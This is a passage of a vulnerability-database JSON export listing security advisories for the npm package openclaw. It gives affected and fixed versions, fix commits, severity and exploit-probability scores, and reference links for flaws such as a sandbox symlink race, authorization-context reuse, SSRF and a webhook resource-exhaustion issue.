5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},
{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},
{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},
{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-32921","GHSA-8g75-q649-6pv6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-swjf-k83n-h7gf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92085?format=json","vulnerability_id":"VCID-t2ve-xemk-mqa9","summary":"OpenClaw: OpenShell FS bridge writes stay pinned to the sandbox mount root\n## Summary\nOpenShell FS bridge writes stay pinned to the sandbox mount root \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem writes could let a symlink swap redirect a write outside the intended local mount root.\n\n## Fix\nOpenShell write paths now validate 
the canonical target against the mount root, reject unsafe symlink parents and symlink leaves for writes, and use root-scoped write helpers before syncing to the remote sandbox.\n\n## Fix Commit(s)\n- 7be82d4fd1193bcb7e44ee38838f00bf924ffa76\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44112","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09643","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09624","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11223","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44112"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/
VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7be82d4fd1193bcb7e44ee38838f00bf924ffa76"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wppj-c6mr-83jj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44112","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44112"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-i
n-openshell-fs-bridge-writes","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T17:25:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-swap-race-condition-in-openshell-fs-bridge-writes"},{"reference_url":"https://github.com/advisories/GHSA-wppj-c6mr-83jj","reference_id":"GHSA-wppj-c6mr-83jj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wppj-c6mr-83jj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44112","GHSA-wppj-c6mr-83jj"],"risk_score":4.3,"exploitability":"0.5","weighted_severity":"8.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t2ve-xemk-mqa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89045?format=json","vulnerability_id":"VCID-t2yy-9ume-t7be","summary":"OpenClaw: Collect-mode queue batches could reuse the last sender authorization context\n## Summary\n\nCollect-mode queue batches could 
reuse the last sender authorization context.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nCollect-mode queued messages from different senders could be drained as one batch using the final sender's authorization context, allowing earlier messages to inherit a more privileged context.\n\n## Technical Details\n\nThe fix splits collect-mode batches by sender authorization context before dispatch, preserving each message's own trust state.\n\n## Fix\n\nThe issue was fixed in #66024. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `43d4be902755c970b3d15608679761877718da69`\n- PR: #66024\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43535","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07719","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08979","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.08998","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43535"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66024","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66024"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43535","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43535"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CV
SS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches"},{"reference_url":"https://github.com/advisories/GHSA-jwrq-8g5x-5fhm","reference_id":"GHSA-jwrq-8g5x-5fhm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jwrq-8g5x-5fhm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109967?format=json","purl":"pkg:npm/openclaw@2026.4.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vuln
erability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"}],"aliases":["CVE-2026-43535","GHSA-jwrq-8g5x-5fhm"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t2yy-9ume-t7be"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91408?format=json","vulnerability_id":"VCID-t8e5-163r-37hc","summary":"Duplicate Advisory: web_search citation redirect SSRF via private-network-allowing policy\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-g99v-8hwm-g76g. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 contain a server-side request forgery vulnerability in web_search citation redirect resolution that uses a private-network-allowing SSRF policy. 
An attacker who can influence citation redirect targets can trigger internal-network requests from the OpenClaw host to loopback, private, or internal destinations.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989","reference_id":"CVE-2026-31989","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989"},{"reference_url":"https://github.com/advisories/GHSA-44c9-4rg5-qjgq","reference_id":"GHSA-44c9-4rg5-qjgq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-44c9-4rg5-qjgq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_eleme
nts":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g"}],"fixed_packages":[],"aliases":["GHSA-44c9-4rg5-qjgq"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t8e5-163r-37hc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89218?format=json","vulnerability_id":"VCID-t991-75e7-ykdv","summary":"OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n## Summary\nMS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41405","reference_id":"","reference_type":"","scores":[{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45732","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45716","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00228","scoring_system":"epss","scoring_elements":"0.45736","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41405"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0